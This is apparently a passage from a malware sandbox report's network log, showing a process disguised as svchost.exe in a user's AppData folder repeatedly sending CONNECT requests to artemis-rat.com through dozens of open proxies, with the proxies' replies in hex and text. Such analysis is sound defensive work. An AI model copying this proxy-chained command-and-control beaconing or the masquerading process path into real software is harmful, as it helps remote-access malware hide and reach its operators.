Mar 9, 2024 13:14:29.021451950 CET	309	IN	HTTP/1.1 400 Bad Request Server: nginx/1.23.4 Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 34 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.23.4</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2124	192.168.2.5	56764	104.23.141.196	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.856515884 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.010979891 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2125	192.168.2.5	55550	114.108.177.104	60984	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.857777119 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2126	192.168.2.5	56776	104.19.138.4	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.861915112 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.016412973 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2127	192.168.2.5	56561	119.196.168.183	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.862865925 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2128	192.168.2.5	56621	147.75.92.251	10006	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.865058899 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.149209023 CET	356	IN	HTTP/1.0 502 Bad Gateway Server: Zscaler/6.3 Content-Type: text/html Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 31 3e 44 4e 53 20 65 72 72 6f 72 3c 2f 68 31 3e 0d 0a 3c 70 3e 44 4e 53 20 65 72 72 6f 72 20 28 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 6f 66 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 29 3c 62 72 3e 3c 62 72 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 73 70 65 6c 6c 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 62 72 3e 3c 2f 70 3e 0d 0a 3c 21 2d 2d 5a 73 63 61 6c 65 72 2f 36 2e 33 2d 2d 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h1>DNS error</h1><p>DNS error (the host name of the page you are looking for does not exist)<br><br>Please check that the host name has been spelled correctly.<br></p>...Zscaler/6.3--></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2129	192.168.2.5	56785	104.16.107.206	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.866096973 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.020515919 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2130	192.168.2.5	56495	35.154.71.72	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.866720915 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.249789000 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:29 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2131	192.168.2.5	56695	23.152.40.15	5050	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.868103981 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2132	192.168.2.5	56780	162.159.242.230	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.870667934 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.033910036 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2133	192.168.2.5	56628	13.40.239.130	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.874027967 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.172269106 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:29 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2134	192.168.2.5	56579	130.162.213.175	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.874063969 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.212101936 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2135	192.168.2.5	56534	222.223.103.232	7302	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.876539946 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com
Mar 9, 2024 13:14:29.239834070 CET	90	IN	HTTP/1.1 200 OK Content-Type: application/json Connection: close Content-Length: 55

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2136	192.168.2.5	55524	146.59.18.246	40975	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.878792048 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.646058083 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2137	192.168.2.5	56982	43.157.51.43	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.879622936 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2138	192.168.2.5	56983	43.157.51.43	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.880897999 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2139	192.168.2.5	56985	43.157.51.43	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.881655931 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2140	192.168.2.5	55522	188.164.196.31	53276	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.881926060 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.677061081 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2141	192.168.2.5	56987	43.157.51.43	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.882234097 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2142	192.168.2.5	56570	116.62.147.249	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.883546114 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.214411020 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2143	192.168.2.5	56824	203.30.191.34	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.887295961 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.041461945 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2144	192.168.2.5	55653	92.204.134.38	7785	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.893094063 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.145889997 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.146404028 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2145	192.168.2.5	56720	162.243.102.207	9764	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.894903898 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2146	192.168.2.5	56846	104.16.108.42	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.898092031 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.052306890 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2147	192.168.2.5	56855	104.16.25.216	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.904045105 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.058458090 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2148	192.168.2.5	56612	77.91.74.77	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.915702105 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.252578020 CET	129	IN	HTTP/1.1 301 Moved Permanently Location: https://artemis-rat.com:443 Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2149	192.168.2.5	56562	190.128.228.182	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
